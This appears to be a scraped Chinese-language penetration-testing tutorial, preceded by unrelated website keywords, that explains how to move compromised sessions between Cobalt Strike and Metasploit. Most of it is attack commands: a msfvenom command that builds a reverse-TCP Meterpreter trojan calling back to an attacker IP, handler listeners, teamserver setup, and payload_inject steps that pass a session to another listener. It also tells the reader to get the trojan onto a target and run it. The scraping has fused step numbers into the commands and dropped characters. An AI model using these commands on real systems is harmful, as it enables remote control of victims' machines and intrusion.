寿县住房与城乡建设局网站,西安建筑网站建设,网站地址英文,网站备案中打不开内网安全#xff1a;Cobalt Strike 与 MSF 联动#xff08; 会话 相互转移 #xff09;
在渗透中#xff0c;有时候 Cobalt Strike 会话可能会受限制#xff0c;所以我们需要把 Cobalt Strike 会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上#xff0c;但是…内网安全Cobalt Strike 与 MSF 联动 会话 相互转移
在渗透中有时候 Cobalt Strike 会话可能会受限制所以我们需要把 Cobalt Strike 会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上但是我们需要 操作更简便 或者 展示力更好所以我们会把 MSF 上的会话转移到 Cobalt Strike 上进行后面的渗透. 目录
内网安全Cobalt Strike 与 MSF 联动 会话 相互转移
在 MSF 会话中 转移 会话到 CS 上.
1上线 MSF 会话.
2进行监听模式.
3开启 Cobalt Strike 工具.
4添加一个监听.
5会话转移到 CS 中.
在 CS 会话中 转移 会话到 MSF 上.
1开启 Cobalt Strike 工具.
2添加一个监听.
3生成一个程序.(木马)
4重新添加一个监听器.
5会话转移到 MSF 中. 在 MSF 会话中 转移 会话到 CS 上.
1上线 MSF 会话.
生成一个程序后面木马msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.0.106 lport4422 -f exe bgxg.exe 2进行监听模式.
1msfconsole2use exploit/multi/handler3set payload windows/meterpreter/reverse_tcp4set lhost 192.168.0.106 # 本地 IP 地址5set LPORT 4422 # 和后面一样的端口6run 3开启 Cobalt Strike 工具.
服务端1cd cs4.7 //切换为 cs 目录2chmod ax ./TeamServerImage // 修改权限.3./teamserver 192.168.0.106 888888 //这里的IP地址是 服务端的IP后面的是客户端的登录密码. 客户端1cd cs4.7 // 切换为 cs 目录2./start.sh // 打开 客户端. 4添加一个监听. 5会话转移到 CS 中.
1background // 挂起 会话.2use exploit/windows/local/payload_inject3set payload windows/meterpreter/reverse_http4set lhost 192.168.0.101 //设置 CS 服务端的 IP 地址.5set lport 8080 //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])6set DisablePayloadHandler True7set PrependMigrate True8sessions -l //查看 会话 是多少则设置多少9set session 1 [一般是 1(上面查看的结果)]10exploit // 进行 测试. 在 CS 会话中 转移 会话到 MSF 上.
1开启 Cobalt Strike 工具.
服务端1cd cs4.7 //切换为 cs 目录2chmod ax ./TeamServerImage // 修改权限.3./teamserver 192.168.0.106 888888 //这里的IP地址是 服务端的IP后面的是客户端的登录密码. 客户端1cd cs4.7 // 切换为 cs 目录2./start.sh // 打开 客户端. 2添加一个监听. 3生成一个程序.(木马) 想方法把这个程序上传到目标主机并执行这个执行. 4重新添加一个监听器. 5会话转移到 MSF 中.
1msfconsole // 打开 MSF 工具2use exploit/multi/handler // 设置 监听 模块.3set payload windows/meterpreter/reverse_http // 设置 payload4set lport 9999 // 设置一个端口和上面的监听一样的端口5set lhost 0.0.0.0 // 设置本地的 IP 地址6exploit // 进行测试